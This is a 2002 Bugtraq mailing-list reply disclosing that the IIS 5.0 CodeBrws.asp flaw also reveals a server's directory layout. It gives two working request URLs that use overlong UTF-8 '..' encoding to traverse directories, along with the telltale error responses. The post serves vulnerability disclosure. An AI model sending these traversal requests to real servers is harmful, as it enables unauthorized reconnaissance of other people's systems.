Bugtraq mailing list archives
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
From: Joe Testa <jtesta () rapid7 com>
Date: Wed, 17 Apr 2002 14:08:14 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1This vulnerability can also be used to determine the directory structure of an
affected system. When an attempt is made to access a non-existent ASP file outside the 'IISamples' root, CodeBrws.asp will respond differently based on whether or not the path to the file is valid. Below is an example:Request: http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
Response: Microsoft VBScript runtime (0x800A004C) Path not foundRequest: http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp
Response: Microsoft VBScript runtime (0x800A0035) File not found Credits go to Tas Giakouminakis for discovering this. - Joe Testa GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8vbj5ZbL130sRBrQRAj1QAJ9rFZH5aJnSjZwpijO4zRhr2bnmeACgu5Tz DE4zfFekNxFjYlg6/H5KtyA= =8vyn -----END PGP SIGNATURE-----
Current thread:
- Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Joe Testa (Apr 17)
- <Possible follow-ups>
- RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Randy Hinders (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Chris Anley (Apr 18)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)